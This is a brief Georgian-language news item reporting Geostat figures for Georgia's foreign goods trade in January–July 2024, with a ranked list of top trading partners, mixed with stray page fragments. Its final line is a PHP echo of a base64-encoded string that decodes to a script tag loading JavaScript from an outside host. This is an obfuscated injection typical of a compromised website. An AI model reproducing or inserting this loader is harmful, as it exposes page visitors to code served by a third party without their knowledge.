celsiusi
ავერსი შნაიდერი
საქსტატის მონაცემებით, 2024 წლის იანვარ-ივლისში საქართველოში საქონლით საგარეო სავაჭრო ბრუნვამ 12 მილიარდ 567 მილიონი აშშ დოლარი შეადგინა, რაც წინა წლის შესაბამის პერიოდთან შედარებით 1.6%-ით მეტია.
 
7 თვის მონაცემებით, საქართველოსთვის ნომერ პირველი სავაჭრო პარტნიორი თურქეთია. უფრო დეტალურად, ექსპორტისა და იმპორტის ჯამური მოცულობით, ქვეყნის უმსხვილესი სავაჭრო პარტნიორების ჩამონათვალი ასეთია:
 
თურქეთი - $1.8 მლრდ;
რუსეთი - $1.4 მლრდ;
აშშ - $1.078 მლრდ;
ჩინეთი - $1.056 მლრდ;
აზერბაიჯანი - $724 მლნ;
გერმანია - $661.6 მლნ;
ყირგიზეთი - $590.6 მლნ;
ყაზახეთი - $481.5 მლნ;
სომხეთი - $461.2 მლნ;
იაპონია - $277.7 მლნ.
110
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");